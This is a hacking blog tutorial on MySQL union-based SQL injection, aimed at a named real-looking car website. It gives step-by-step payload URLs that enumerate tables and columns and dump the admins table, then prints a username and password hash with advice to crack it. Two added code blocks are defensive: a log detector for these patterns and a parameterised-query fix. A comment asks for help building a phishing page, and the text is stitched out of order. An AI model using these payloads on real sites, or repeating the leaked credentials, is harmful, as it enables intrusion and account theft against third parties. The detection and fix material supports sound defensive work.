Learn How Hackers Hack Websites MYSQL Injection Tutorial


    - SQL Injection -
This article is about how to hack a website with SQL injection. I and stealthhackroom.blogspot.com take no responsibility for its misuse.

We have a target, http://www.allaboutcar.net/articles.php?topic=-3. Let's see if it is vulnerable to SQL injection. To check, put a ' at the end:
http://www.allaboutcar.net/articles.php?topic=3'
It gives a MySQL database error, which means it is vulnerable to SQL injection. Next, let's get the number of columns. To do that you need the command "order by": put it at the end with increasing numbers.
For example:
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

Do that until you get an error.

It gives an error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--

That means it only has 5 columns, because it didn't give an error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
OK, let's do the union.
To do this you need the command union select:

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--

Like that.

A number should pop up somewhere on the page.

We got number 2 popped, so let's inject into 2.
First we need to check the DB version. If it's 5, we continue; if it's version 4, you have to guess the tables and columns. To check the database version use "@@version" or "version()". It's version 5:

5.0.67

OK, now let's get the table names. To do that you need these:

group_concat(table_name)
information_schema.tables

We put this in because we only need the tables of the default database:

where table_schema=database()--

With that we have the list of tables:

http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

Admins,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,forum_c,gbook,infopages,jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,users

OK, we have the admin table here. Let's get the columns now. To do that just change this:
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

to
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns:

id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,topic,author,id,ip,date,id,title,alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,what,date,wid,name,mail,title,text,ip,id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,

Now let's put this together!

Table: admins
Columns: id,nick,pass,

Here we ask for the data in those columns from the admins table:
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
Now we have the id, nick and password hash. You need to use an MD5 cracker to crack this password.
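From the defender's side, each step above leaves a recognisable request in the web server's access log. The following is an added example, not part of the original post: it scans log lines for those request shapes and reports clients that fired several of them. The log format, rule names and sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 "GET /articles.php?topic=3' HTTP/1.1" 500
203.0.113.5 "GET /articles.php?topic=3%20order%20by%205-- HTTP/1.1" 200
203.0.113.5 "GET /articles.php?topic=3%20order%20by%206-- HTTP/1.1" 500
203.0.113.5 "GET /articles.php?topic=-3+UNION+SELECT+1,@@version,3,4,5-- HTTP/1.1" 200
203.0.113.5 "GET /articles.php?topic=-3+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables-- HTTP/1.1" 200
198.51.100.7 "GET /articles.php?topic=12 HTTP/1.1" 200
198.51.100.7 "GET /search.php?q=order+by+phone HTTP/1.1" 200
"""

# Assumed log format: client, quoted GET request line, status code.
LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})$')

# One rule per step of the walkthrough; matched against decoded, lower-cased values.
RULES = {
    "quote_probe": re.compile(r"^-?\d+\s*['\"\\]"),
    "order_by_n": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (all )?select\b"),
    "version_probe": re.compile(r"@@version|\bversion\s*\("),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\."),
}

def normalise(value):
    """Lower-case and collapse whitespace so spacing and case do not hide a match."""
    return re.sub(r"\s+", " ", value.lower()).strip()

def scan(log_text):
    """Return {client_ip: sorted names of the rules that client's requests fired}."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a GET line in the assumed format
        ip, target, _status = m.groups()
        # parse_qsl undoes %XX and '+' encoding before the rules run
        for _name, value in parse_qsl(urlsplit(target).query):
            for rule, rx in RULES.items():
                if rx.search(normalise(value)):
                    hits.setdefault(ip, set()).add(rule)
    return {ip: sorted(rules) for ip, rules in hits.items()}

def suspects(log_text, min_rules=3):
    """Clients that fired at least min_rules distinct rules: a walk, not a typo."""
    return sorted(ip for ip, rules in scan(log_text).items() if len(rules) >= min_rules)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), suspects(SAMPLE_LOG))
```

A single rule firing once can be a typo or a search term; several distinct rules from one client in sequence is the pattern worth alerting on.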
This tutorial is only for educational purposes.
So friends, that's all for this tutorial.
Username : MaTySeK, 

Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
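Every step above works because the topic value is pasted into the SQL text and database errors are shown to the visitor. The following is an added example, not from the original post, contrasting that with an allow-listed, bound parameter and a generic error response. Python's sqlite3 stands in for the site's PHP/MySQL code, and the table contents and function names are assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed row, 5 columns)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT, added TEXT)")
    db.execute("INSERT INTO articles VALUES (3, 'Brakes', 'article body', 'staff', '2010-01-01')")
    return db

def get_article_vulnerable(db, topic):
    # The request value becomes part of the SQL text, so the database parses it as SQL.
    return db.execute("SELECT * FROM articles WHERE id = " + topic).fetchall()

def get_article_safe(db, topic):
    # 1) Allow-list: an article id is a plain ASCII decimal number, nothing else.
    if not (topic.isascii() and topic.isdigit()):
        raise ValueError("topic must be a positive integer")
    # 2) Bound parameter: the value is sent separately from the SQL text.
    return db.execute("SELECT * FROM articles WHERE id = ?", (int(topic),)).fetchall()

def handle_request(db, topic):
    """Return (status, body) and never echo a database error to the client."""
    try:
        rows = get_article_safe(db, topic)
    except ValueError:
        return 400, "bad request"
    except sqlite3.Error:
        return 500, "internal error"  # details belong in the server log only
    return (200, rows[0][1]) if rows else (404, "not found")

if __name__ == "__main__":
    db = make_db()
    payload = "-3 union select 1,2,3,4,5--"  # the page's own union test
    print(get_article_vulnerable(db, payload))  # attacker-chosen row comes back
    print(handle_request(db, payload))          # rejected before reaching SQL
    print(handle_request(db, "3"))              # normal request still works
```

In the site's own stack the same two measures are an integer check on `topic` plus a prepared statement, with the database account limited to the tables the page needs.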

15 comments:

Unknown said...

where to put username and password ??

Unknown said...

Is there any way to lock the USB port so that no one can transfer data in absence.

Regards..

Unknown said...

i don't get the command union select

what do you mean by there should be number pop up somewhere

should i have to put the number 1,2,3,4,5-- in a series or i have to put the number 1 by 1 to check it

by putting 1 by 1 i get an error on whole numbers 1,2,3,4,5

by putting the number in a series how should know the pop up number????

please tell me

KARTHIKEYAN said...

Please tell how to Inject in Stored Procedure..
I heard that it is very hard to inject. Is it So

Love said...

k i ill try

Unknown said...

The used SELECT statements have a different number of columns

Unknown said...

when execute this script above mention error showing

select * from xyz where id=1 union select 1 ,group_concat(table_name),1 from information_schema.tables where table_schema=database()--

Unknown said...

I want to make a phishing page can you help me out with this contact me at jimmyjason63@gmail.com
